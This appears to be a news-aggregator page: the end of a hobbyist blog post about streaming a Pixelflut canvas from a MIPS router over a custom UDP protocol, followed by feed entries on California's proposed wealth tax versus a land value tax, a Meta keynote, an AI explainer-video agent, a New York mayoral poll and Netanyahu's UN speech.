Anyways, at this point I had enough. FFmpeg is again out. Even if I got the above to work, I was looking at a 40% CPU overhead for what should amount to a memcpy from a framebuffer into a network card. Unacceptable.

Kleines Filmröllchen’s Shitty Video Streaming

Because I have no creativity, that’s the name I gave my custom streaming protocol, KFSVS. It only encodes the most basic information to fix the issues with FFmpeg. Based on the experience I had gathered so far, it was very easy to come up with something that would do exactly what I needed and nothing more:

  • Basic sync support. A receiver should be able to enter the stream at any point, and packet loss should not permanently destroy the stream. However, no complicated checksumming or framing, so out-of order packets can mess up one or two frames.
  • Server simply needs to send the framebuffer into the network.
  • Be compatible with both big- and little-endian. Because the server memcpy’s the framebuffer, and the framebuffer is different depending on endianness, I decided for a header flag which communicates the endianness.

Therefore, KFSVS works like this: You send a series of KFSVS frames via UDP. A frame starts with a 24-byte header. The first 16 bytes are a funny string (which also contains the phrase KFSVS ) which should never appear in a normal framebuffer. 5 The next 4 bytes are the frame size, which is mainly so that the client knows how much to read. It’s still necessary to set the aspect ratio on the client-side manually, which is not a problem. The last 4 bytes in the header are a generic flag container which for now is always 0 if the framebuffer is big-endian, with a byte order of ABGR within a pixel, or 1 if it’s little endian, with a byte order of RGBA within a pixel. Both u32’s are big endian, because network order and MIPS, of course.

The header should start in a UDP packet, and you can send however many packets you need after that to transmit the rest of the frame. In fact, my basic implementation sends the header in its own packet, but that’s not really necessary. I actually found out by trying to send the entire framebuffer in a single UDP packet that Linux has a maximum packet size, even for IPv6 where 65536 is in fact not a limit for UDP packets. Either way, my implementation started out with 65000 bytes per UDP packet, which fragments into 46 IPv6 fragments at my home network’s 1440 MTU. I’m still surprised that this Just Works, and I’m prepared for the eventual event network where it won’t.

Figure 5:

Probably the first time I’ve seen a Next Header field that’s actually an IPv6 option, at least in the wild.

Eagle-eyed readers can already tell from the packet capture that I did immediately try this on the actual router, and I got — 10 fps, no problem. However, throwing a client at it once again destroys the framerate, understandably. I reduced it down to 1-2 fps for the time being. That feels good enough for a viewable experience.

But, until now, I had no output for this data. I was able to see both in Wireshark and nc that the data looked plausible, that the big-endian flag and framebuffer size were set correctly, and that the framebuffer byte order was actually big-endian. But that’s full-on Matrix-style “I don’t even see the code”. So I wrote some shitty little Rust tool that spits out rawvideo again, on the command line, for ingestion into ffmpeg/ffplay/gstreamer/obs/v4l2/whatever. In proper rgb24 format, of course, with endianness properly swapped as needed.

Some things I discovered while writing this code:

  • The endianness flag is super convenient for sending different breakwater outputs (both from my PC for script testing, and from the router for full-stack testing) from different endianness machines to the same output. It can just switch on the fly!
  • Rust’s to_ne_bytes does not mean to_network_endian_bytes . I didn’t even read the documentation and just assumed that. It actually means to_native_endian_bytes . And here I was wondering for half an hour why the framebuffer size was completely bogus, why the frames were glitching out, and why header data entered the frames.

So here’s the thing: I’m really bad at writing unsafe Rust. Even with all of the above fixes, sometimes frames would just get messed up; not exactly surprising in UDP. Except I could never find the issue with Wireshark. And it wasn’t just reordered packets, it was headers that were missing every other byte. My header has a hex sequence like aabbccddeeff , but in these cases, I would receive aabbddee or similar. I tried several solutions including TCP and avoiding packet fragmentation (remember the thing about 65000 byte UDP packets?). But in the end I resorted to checking each packet for whether it contained a header, even while I was reading the frame body. This improved the situation in two ways: first, most of the glitches disappeared even if there seemed to be no random headers appearing. Second, it discards invalid frames, which leads to visual dropouts obviously, but that’s better than a glitched frame.

But finally:

Figure 6:

It lives!

When I shared this (even before getting here) in the Pixelflut task force group chat, I got an interesting message from the original Pixelflut creator (!):

Figure 7:

Oh no.

This thought had never crossed my mind. I had run the thing at 100% load for a while the days before, and was just about to do it again. Maybe I shouldn’t have expected that these old SoCs would be slow for a reason, or that they would be designed for passively cooling their TDP.

To confirm this, I took off the case, and indeed the SoC was hot to the touch, probably above 70°C. So I quickly grabbed the BMC cooler of an old server I had lying around (the cooler, not the whole server):

Figure 8:

Before the heatsink…

Figure 9:

… and after.

Anyways, with all of that fixed, I had one last problem:

Rate Limiting

Whenever I used even the most conservative hyperflut settings, the router would always max out its CPU. Maximum TCP reception bandwidth was always 100Mbit/s. Worse, the canvas stream would stop functioning reliably, maybe every fifth frame could be sent out. I needed a better way to rate limit clients. Since I didn’t want to start messing with the nft rules on the router (I have broken its networking once before, necessitating a hard reset) or learn a new piece of networking software (I was really not into network stuff at this time, especially with all the weird issues I had with network video streaming), I instead opted to implement rate limiting within breakwater. That was actually trickier than I imagined, but it worked in the end. Nothing spectacular to show here.

However, even after the rate limit, a client sending lots of packets would still max out the CPU. It didn’t break the canvas stream when it did so, which was really all I cared about. The point of the rate limiting is hopefully more that people use smarter clients instead of faster ones. Which, coincidentally, is one of the original design ideas behind Pixelflut, and one that we can really get back to on such limited hardware.

Success

And that’s… pretty much it! I plan to run this live at at least one event. All the code is in my breakwater fork ; at least some of it will be contributed upstream. For the receive script, I displayed the data with

./kfsvs-receive.rs '[::]:48550' | ffmpeg -fflags nobuffer -flags low_delay -probesize 32 -analyzeduration 1 -strict experimental -f rawvideo -video_size 720x405 -pix_fmt rgb24 -r 1 -i - -c:v mjpeg -q 1 -pix_fmt yuv444p -f matroska pipe:1 | ffplay -framedrop -fflags nobuffer -flags low_delay -probesize 32 -analyzeduration 1 -

but you should be able to pipe the stdout anywhere (it’s only raw rgb24 after all). Breakwater you can run with a command-line like:

./breakwater -c 1 -f 1 --network-buffer-size 64000 --width 720 --height 405 --kfsvs 'destination.local:48550' --allowed-bytes-per-second 1000

The complete compilation command-line I eventually settled on was:

RUSTFLAGS='-Clink-arg=-Wl,--dynamic-linker=/lib/ld-musl-mips-sf.so.1 -Ctarget-cpu=mips32r2 -Ctarget-feature=+soft-float' cargo build -Zbuild-std --config 'target.mips-unknown-linux-musl.linker="mips-linux-musl-gcc"' --target mips-unknown-linux-musl --no-default-features --release --package breakwater

Thanks to UDP, you can start server and display application(s) in any order you want. The latency is usually about 4-5 frames (=seconds), which is largely an ffmpeg problem.


Wow, you made it to the end of the post! This got much longer than I expected, mainly because I wanted to write about every detail in the process of hacking. Checkout breakwater and pixelflut.org , they’re cool projects (and I’m totally biased). Thanks for reading!

~ kleines Filmröllchen

/Computer science/ /Rust/ /Linux/ /Pixelflut/

California is chasing wealth that has feet

Hacker News
blog.landeconomics.org
2026-09-24 16:34:32
Comments...
Original Article

The Center for Land Economics full report can be found here ; our op-ed on the same argument ran in the San Francisco Chronicle yesterday .

Last week California certified a Billionaire Wealth Tax for the November ballot: a 5 percent one-time levy on the state’s billionaires, paid out over five years, to raise about $20 billion a year for health care, food aid, and schools after federal cuts. We understand the impulse. The state has a revenue hole, and billionaires can afford to help fill it.

But the tax will fail at the thing it’s for, and it will fail for a simple reason: billionaires, unlike land, have feet.

We just spent months building the empirical case, calculating the aggregate of California’s land values, in a new report from the Center for Land Economics . The short version: land is one of the biggest pools of wealth there is, California has more of it than almost anything else, and it cannot leave the state.

We estimated the total value of California’s land, summing it up parcel by parcel: about $8.14 trillion. We checked that figure two more ways — against federal housing-finance data and against time-trended sales — and all three methods land in the same range. It is, as far as we know, the first credible bottom-up estimate of what California’s land is actually worth.

That number is roughly eight times the billionaire wealth the state can still realistically tax. Los Angeles County’s land alone is worth more than the entire billionaire base the wealth tax is chasing. The Bay Area’s is close behind.

And land is the rare tax base that just sits there. A billionaire can move to Austin. While their portfolio can move in an afternoon, their land cannot.

The wealth tax’s own math assumes a $2 trillion base, which is a nearly 2x overestimate due to wealth flight.

Six California billionaires — Larry Page, Sergey Brin, Peter Thiel, Don Hankey, Travis Kalanick, and Steven Spielberg, worth roughly $540 billion combined — had already moved their tax residency out of state before the measure’s January 1, 2026 cutoff. Mark Zuckerberg (about $220 billion) followed in early 2026 and will almost certainly fight the retroactive reach in court. Add a roughly $200 billion overestimate that other economists have flagged in the proposal’s own model, and nearly half the assumed base is gone.

To still raise its $20 billion against what’s left, the rate would have to climb from 1 percent toward 1.6 or 1.9 percent depending if Zuckerberg prevails in court, which only gives the billionaires who stayed one more reason to follow their neighbors out. This is the trap with taxing a small number of mobile people: raise the rate to chase the ones who left, and you push out the ones who remained.

Here is the comparison that should reframe the whole debate.

A land value tax of just 0.25 percent would raise the same $20 billion a year the wealth tax promises on a base eight times larger, that grows with California’s economy instead of fleeing it, and that cannot move. (Go bigger and the math still holds: a rate of about 1 percent would cover California’s entire $87 billion health and human services budget, in perpetuity.)

A land value tax is just an ordinary property tax with one change: it falls solely on the value of the land and not the buildings on it. The land value tax can’t be dodged by leaving nor can it be passed on to renters. Meanwhile, it captures the windfall the public itself creates: when the state builds a transit line, the surrounding land gets more valuable, and the tax returns part of that to the people who paid for it.

Because land value is wildly concentrated, the burden lands hardest on the prime coastal lots and downtown blocks owned by those with the most, and barely touches a working family’s house in the Central Valley. It reaches the wealthy without having to chase them.

None of this is really about billionaires; California reaches for exotic taxes because its normal one has been broken since 1978.

Proposition 13 capped property taxes and froze assessed values until a property sells, so a long-tenured owner can pay a small fraction of what the young family next door owes on an identical house. We estimate California now assesses property at somewhere between 44 and 60 percent of what it’s actually worth. In other words, the state has quietly chosen not to collect on roughly half its own real-estate base. As property revenue fell, income taxes rose to fill the gap, which is how California ended up with the highest income tax rate in the country and a revenue base that walks out the door whenever it’s squeezed. The wealth tax is the most desperate squeeze yet, and it does nothing to repair the base underneath.

The same mistake is being made everywhere. Land value taxation is about as close as economics gets to a free lunch, yet from Florida to California, they are ignoring it.

Florida is trying to abolish its property tax; critics estimate the lost revenue would have to be made up by roughly doubling the state sales tax, trading the one tax that doesn’t distort the economy for one that taxes every purchase working families make. California is going the other way, layering a brand-new tax on mobile billionaire wealth on top of an already-broken property tax. Both should look instead to the tax base sitting right under their feet.

The wealth California can actually tax is the ground itself: stable, enormous, made valuable by all of us, and incapable of moving to Miami.

Greg Miller and Lars Doucet are co-founders of the Center for Land Economics .

Discussion about this post

Ready for more?

Meta Connect Keynote 2026

Daring Fireball
www.youtube.com
2026-09-24 16:30:01
Meta’s annual keynote yesterday was a tight 55-minute live event held on their campus in Menlo Park. I watched the whole thing this morning, before recording tomorrow’s episode of Dithering. (Which you should subscribe to.) It was a good keynote. Consumer products announced: Third-generation Meta...

Opus 5.5 is good at explainer videos

Hacker News
launchvideo.io
2026-09-24 16:28:47
Comments...
Original Article

Paste a URL or describe the product. Opus 5.5 writes the film and a serverless agent renders it. About four minutes and roughly 100k tokens per video.

examples

Made by this page, untouched.

Each one is a single run: a URL or a prompt in, an MP4 out. No edits.

Jev, by TypeSafe AI

typesafe.ai

OpenComputer

opencomputer.dev

Infera (from a prompt)

“make a modern slick and punchy video for a modern startup that works on inference”

how it runs

A serverless agent on OpenComputer. Yours in one click.

The whole product is one agent file, three tools, and this form. OpenComputer runs the agent, the microVM it renders in, the model gateway, and the session API the page polls.

Agent
One OpenComputer serverless agent, defined in TypeScript and deployed with opencomputer deploy . No framework, no queue, no server of ours.

Model
anthropic/claude-opus-5.5 through OpenComputer's model gateway. Roughly 90k input and 15k output tokens per film, most of it the HTML itself.

Runtime
Every job is one session in a fresh microVM: Amazon Linux 2023 on arm64, 4 vCPU, 8 GB RAM, Node 22. The first tool call installs Playwright's headless Chromium and a static ffmpeg (about a minute); the VM is thrown away after.

Tools
Three defineTool functions. web_fetch returns page text plus title, headings, the most used hex colors, and Google Fonts. check_scene loads the film and reports JS errors and the visible text at sample timestamps. render_video renders and uploads.

Rendering
No video model. The page's clocks (requestAnimationFrame, timers, Date, CSS and Web Animations) are replaced with a virtual clock, so every frame is a deterministic seek. 1920x1080 at 30 fps, JPEG frames piped into libx264, crf 18.

Storage
The agent holds no secrets. The form mints a Vercel Blob upload token scoped to one path for three hours, parks it in a per-job manifest, and the tool fetches it by job id. The finished MP4 is a public Blob URL.

Control plane
This page uses the same API the CLI does: create a session, send one turn, poll the event stream (tool.started, tool.completed, turn.completed) to show progress, and treat the MP4 appearing in Blob as done.

// opencomputer/agents/director/agent.ts
import { useInput, useModel, useTool } from "@opencomputer/agent";
import { checkScene, renderVideo } from "./tools/scene.js";
import { webFetch } from "./tools/web.js";

export default function Agent() {
  const input = useInput();           // the JOB block from the form
  useModel("anthropic/claude-opus-5.5");
  useTool(webFetch);                  // read the product's site
  useTool(checkScene);                // load the HTML, report errors + visible text
  useTool(renderVideo);               // headless Chromium → ffmpeg → Blob
  return `You are a motion designer who writes code. ...`;
}

$ npx opencomputer template deploy https://github.com/diggerhq/shipvideo

Everything above is in the repo, and one click deploys it to your account . The idea comes from Deedy's post on Opus 5.5 and instructional video: the model writes the film as code, and code renders the same every time.

Mamdani is the most popular elected official in NYC: poll

Hacker News
www.nydailynews.com
2026-09-24 16:25:30
Comments...
Original Article

Nine months into his mayoralty, Mayor Mamdani’s honeymoon phase is still going strong, according to a poll released Wednesday.

Mamdani is the most popular elected official in New York City, a new poll from Quinnipiac found, with his statewide popularity on par with that of Gov. Hochul.

Statewide, 46% of likely voters said they have a favorable opinion of Mamdani, while 36% had an unfavorable opinion of him and 15% haven’t heard enough about him. The Quinnipiac poll came out the same day as a similar Siena poll, which found he had the same favorable rating but a 44% unfavorable rating.

The poll found that, when broken by gender, Mamdani did ten points better among women statewide.

Rep. Alexandria Ocasio-Cortez received a 41% favorable and 36% unfavorable rating across the state; Sen. Chuck Schumer got 34% to 51% unfavorable, and the Democratic Socialists of America, the organization that has shaped much of both Mamdani and AOC’s political identity, received a rating of 29% favorable to 43% unfavorable.

U.S. Rep. Alexandria Ocasio-Cortez, D-N.Y., smiles during a campaign rally for Michigan Democratic U.S. Senate primary candidate Abdul El-Sayed, Saturday, July 18, 2026, in Detroit. (AP Photo/Jose Juarez)
U.S. Rep. Alexandria Ocasio-Cortez, D-N.Y., smiles during a campaign rally for Michigan Democratic U.S. Senate primary candidate Abdul El-Sayed, Saturday, July 18, 2026, in Detroit. (AP Photo/Jose Juarez)

Gov. Hochul received a 46%-43% favorability rating statewide, with her numbers growing to 53% favorable among likely voters from New York City.

The poll, which surveyed 1,026 likely voters across the state with a margin of error of +/- 4.1 percentage points, showed Hochul with a comfortable lead over Republican challenger Bruce Blakeman, with 58% of likely voters supporting Hochul and 39% supporting Blakeman.

Among likely voters in the five boroughs, Mamdani nets a whopping 60% favorability rating, with 29% saying they don’t have a favorable opinion of him.

That’s higher than the local favorability ratings of not just Hochul, but also AOC and Schumer, who received 50%-30% favorability ratings and 32%-55%, respectively. AOC has not ruled out a 2028 run for either Schumer’s Senate seat or the presidency.

Gov. Kathy Hochul speaks alongside Mayor Zohran Mamdani and New York Attorney General Latitia James at a press conference on ICE overreach at the governor's Manhattan office on Tuesday, Aug. 12, 2026 in Manhattan, New York. (Barry Williams / New York Daily News)
Gov. Kathy Hochul speaks alongside Mayor Zohran Mamdani and New York Attorney General Latitia James at a press conference on ICE overreach at the governor’s Manhattan office on Tuesday, Aug. 12, 2026 in Manhattan, New York. (Barry Williams / New York Daily News)

“As Democrats try to regain control of Congress, Senate Minority Leader Chuck Schumer’s scores are underwater in his home state. It’s worth noting Congresswoman Alexandria Ocasio-Cortez is seen in a more positive light at a time when she’s being closely watched as she decides her political future and whether it might include a challenge to Schumer,” Quinnipiac University Poll Assistant Director Mary Snow said in a statement.

These numbers come as the midterms loom, although Mamdani has not committed to using his influence to weigh in on races outside New York, telling CNN this week he was more focused on filling potholes than getting involved in national politics. AOC, for her part, has donated $300,000 to New York State Democrats and is slated to campaign for Democrats in upstate New York this week.

Mamdani endorsed Hochul back in February. The governor has said she expects help from Mamdani in her reelection bid.

Benjamin Netanyahu Receives a Hostile Welcome in Zohran Mamdani's New York

hellgate
hellgatenyc.com
2026-09-24 16:22:55
As the Israeli Prime Minister addressed the United Nations, dwelling at length on New York’s mayor, crowds outside demanded his arrest....
Original Article

Israeli Prime Minister Benjamin Netanyahu arrived in a hostile New York City on Thursday to rail against Mayor Zohran Mamdani on a global stage.

Netanyahu, who is wanted by the International Criminal Court on charges of war crimes and crimes against humanity, including starvation and intentionally attacking civilians in Gaza, and who presides over a government Amnesty International concluded is genocidal, faced boos and a coordinated delegate walk-out at the start of his speech in front of the United Nations General Assembly that left the majority of the chamber empty, the Associated Press reported.

Before an audience of world leaders, Netanyahu spent three minutes of his speech railing against "the antisemitic mayor of New York." His screed began: "Shame on you for spitting in the face of truth, Mr. Mamdani. Since you were elected mayor of this city, many Jews no longer feel safe in New York. They talk to me. They tell me, 'This isn't the city we remember.'"

Give us your email to read the full story

Sign up now for our free newsletters.

Sign up